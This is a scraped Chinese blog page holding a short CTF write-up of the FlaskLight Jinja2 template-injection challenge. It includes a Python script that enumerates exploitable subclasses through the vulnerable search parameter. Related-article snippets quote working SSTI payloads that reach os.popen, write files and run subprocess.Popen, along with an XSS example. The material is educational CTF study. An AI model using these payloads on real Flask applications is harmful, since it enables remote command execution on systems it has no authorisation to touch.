flask ssti-subprocess.Popen(8-18)

最新推荐文章于 2024-08-07 15:27:34 发布
最新推荐文章于 2024-08-07 15:27:34 发布
阅读量823 收藏 1
点赞数 1
分类专栏: ctfweb buuctf刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Realiy/article/details/108089591
版权
本文介绍了在CSCCTF 2019 Qual的FlaskLight挑战中,如何利用 SSTI(Server-Side Template Injection)漏洞尝试读取文件和执行命令。通过get方法请求发现存在SSTI,并尝试通过subprocess.Popen执行命令,但app.py无法读取,命令执行也受到限制。最终找到了第258行的subprocess.Popen方法作为payload突破口。
摘要由CSDN通过智能技术生成

学习文章

[CSCCTF 2019 Qual]FlaskLight

 get方法请求结合题目试试ssti

说明确实存在ssti

读取文件成功但是读不了app.py,命令执行也被禁止,看看大佬怎么bypass的

先写个脚本爆出可利用的类

import requests
import re
import html
import time

index = 0
for i in range(170, 1000):
    try:
        url = "http://aa86b4ee-a0a7-4634-8ef2-f4e80e7613ce.node3.buuoj.cn/?search={
  {''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
最低0.47元/天 解锁文章
ta3shi
关注
专栏目录
ssti--flask模块
m0_67467924的博客
05-29 297
构造payload:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()模板的作用是使用静态的页面html展示动态的内容。模板其实是一个响应文本的文件,其中变量表示动态部分,告诉模板引擎具体的值需要从使用的数据中获取,使用真实值替换变量,得到字符串的过程被称为渲染。可以使用如下模块控制语句查找,子类的初始化方法中的全局变量里是否存在os,如果有os,就返回当前模板中列表的下标。
flask ssti
kimojinmmp的博客
04-03 2183
1.漏洞成因: 2.漏洞防御: 3.漏洞利用: subclasses()[59]:是找到重载过的__init__类(在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的) (1)''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123") (2)''.__class__.__mro__[2].__subclasses__([59].__init__.__globals__['_
flask 基础ssti注入
weixin_30355437的博客
01-10 361
源代码地址 (请用python2.7运行,python3有点出入) 注入点: 不是返回的静态模板而是反回模板字符串变得让客户端可以控制。 XSS 这里直接 http://39.105.116.195:9000/<script>alert(1)</script>就会有反射性XSS flask对模板文件和模板文件中内容进行转义,可如果直接返回模板字符串或者直接返回字符...
[CSCCTF 2019 Qual]FlaskLight (jinja2模版注入)
最新发布
weixin_73399382的博客
08-07 505
这种有参数的我先直接丢fengjing扫了一下,结果还真搞出来,这工具还是挺牛的,就是没参数的时候搞不了。输入{{7*‘7’}},返回7777777表示是 Jinjia2 模块。进入web界面输入前三个参数,表单输入就是刚才的search参数。输入{{config}}查看配置发现提示flag就在当前目录下。分析完后右边会提示你输入可以输入命令自动生成payload。或者中间加个+号也可以['__glo'+'bals__']输入{{7*‘7’}},返回49表示是 Twig 模块。下面是判断模版注入的方法。
使用执行命令开启flask服务---subprocess.run()相关
qq_43361923的博客
12-27 642
正常执行命令行,修改部分传参,比如文件路径改为服务接受的文件等。这里使用的是以下命令行。
python socketio popen,在一个线程中使用Popen会阻止每一个传入的Flask-SocketIO请求
weixin_42581846的博客
01-15 152
I have the following situation:I receive a request on a socketio server. I answer it (socket.emit(..)) and then start something with heavy computation load in another thread.If the heavy computation i...
Python--subprocess模块
似水流年
06-26 501
参考博客:http://blog.csdn.net/songfreeman/article/details/50735045 subprocess模块提供了一种一致的方法来创建和处理附加进程,与标准库中的其它模块相比,提供了一个更高级的接口。用于替换如下模块: os.system() , os.spawnv() , os和popen2模块中的popen()函数,以及 commands().一、直接
关于flaskSSTI注入
Kr的博客
01-21 7235
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2227
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
例如,对于`subprocess.Popen`这样的类,攻击者可能构造如下payload来尝试执行命令: ```python {{ ''.__class__.__mro__[2].__subclasses__()[index].__init__('ls', shell=True, stdout=None) }} ``` 在实际攻击...
Flask-Shell2HTTP:通过HTTP服务器执行Shell命令(通过Flask的端点)
02-05
Flask-Shell2HTTP 极简主义的扩展,可作为python子进程API的RESTful / HTTP包装器。 将任何命令行工具转换为REST API服务。 通过带有动态参数,文件上传和回调函数功能的flask端点,安全,异步地执行预定义的Shell命令。 设计用于二进制的二进制/ HTTP通信,开发,原型,遥控器和。 用例 将在成功的POST请求上运行的脚本设置到您选择的端点。 请参阅。 将基本命令映射到端点,并向其传递动态参数。 请参阅。 也可以在一个命令中处理多个上载的文件。 请参阅。 如果您在微型容器中分布了不同的二进制文件,则这对于内部docker-to-doc
python subprocess模块 学习笔记
HiTaQini
11-05 811
subprocess模块允许你启动一个新的进程并与其通信。 该模块中只有一个类——Popen 文章最后给出了几个Popen常见的用法
SSTI学习记录
cjdgg的博客
05-03 1616
SSTI学习记录环境语法变量过滤器 环境 from flask import Flask from flask import render_template from flask import request from flask import render_template_string app = Flask(__name__) @app.route('/test/') def test(): code = request.args.get('id') template = '''
python popen函数讲解_subprocess.Popen()详解
热门推荐
weixin_33122261的博客
01-28 1万+
一、subprocess.Popensubprocess模块定义了一个类: Popenclass subprocess.Popen( args,bufsize=0,executable=None,stdin=None,stdout=None,stderr=None,preexec_fn=None,close_fds=False,shell=False,cwd=None,env=None,unive...
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3600
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
Python模块整理(三):子进程模块subprocess
weixin_34320159的博客
03-16 7974
本来收集整理网络上相关资料后整理: 从python2.4版本开始,可以用subprocess这个模块来产生子进程,并连接到子进程的标准输入/输出/错误中去,还可以得到子进程的返回值。 subprocess意在替代其他几个老的模块或者函数,比如:os.system os.spawn* os.popen* popen2.* commands.* 一、subprocess...
使用subprocess模块异步并发执行远程命令
不要踩坏我的圆
09-14 1万+
远程执行命令 运维自动化平台不可避免地会涉及到远程命令执行操作,主要分为两类主要做法:目标机器安装agent,或者使用ssh。 saltstack是一个典型的agent模式的远程控制工具,麻烦的地方是首先要在目标机器上安装saltstack的agent。 使用ssh的模块居多,fabric和ansible是此类工具中的典型,这类工具的优点是方便,不用在目标机安装agent。值得一提的是,这两...
python之subprocess.Popen常用案例
Null的博客
07-02 4358
import subprocess #最基本的启动进程方式类似cmd下执行: notepad.exe text.txt 命令 obj = subprocess.Popen(['notepad.exe','text.txt'], shell = True, stdin=subprocess.PIPE, stdout=subprocess.PIPE ,stderr=subprocess.PIPE)...
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值